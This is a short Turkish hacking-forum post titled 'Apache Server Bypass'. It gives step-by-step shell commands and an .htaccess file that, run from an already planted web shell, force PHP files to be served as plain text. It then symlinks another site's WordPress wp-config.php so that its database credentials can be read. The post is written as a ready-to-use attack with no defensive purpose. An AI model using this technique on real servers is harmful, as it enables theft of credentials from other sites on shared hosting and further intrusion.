Apache Server Bypass

Öncelikle shellimizdeki komut satırına (execute) yerine mkdir diamonds yazıyoruz ve diamonds adında dosyamız oluşuyor. cd diamonds diyerek açtığımız dosyanın içerisine...

Öncelikle shellimizdeki komut satırına (execute) yerine mkdir diamonds yazıyoruz ve diamonds adında dosyamız oluşuyor.

cd diamonds diyerek açtığımız dosyanın içerisine giriyoruz ve .htaccess dosyasi oluşturuyoruz.

Ve .htaccess dosyasinin içerisine şu kodları yaziyoruz :

Kod:
OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
Options Indexes FollowSymLinks
ForceType text/plain
AddType text/plain .php
AddType text/plain .html
AddType text/html .shtml
AddType txt .php
AddHandler server-parsed .php
AddHandler txt .php
AddHandler txt .html
AddHandler txt .shtml
Options All
Options All
ReadmeName diamonds.txt

Yazıyoruz ve dosyayı kaydediyoruz.

En son olarak

ln -s /home/wordpress_site_user/public_html/wp-config.php diamonds.txt

Diyerek bypasslayabiliriz.
 
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
132,978Konular
3,284,436Mesajlar
318,258Kullanıcılar
AtlasCoreXSon Üye
Üst Alt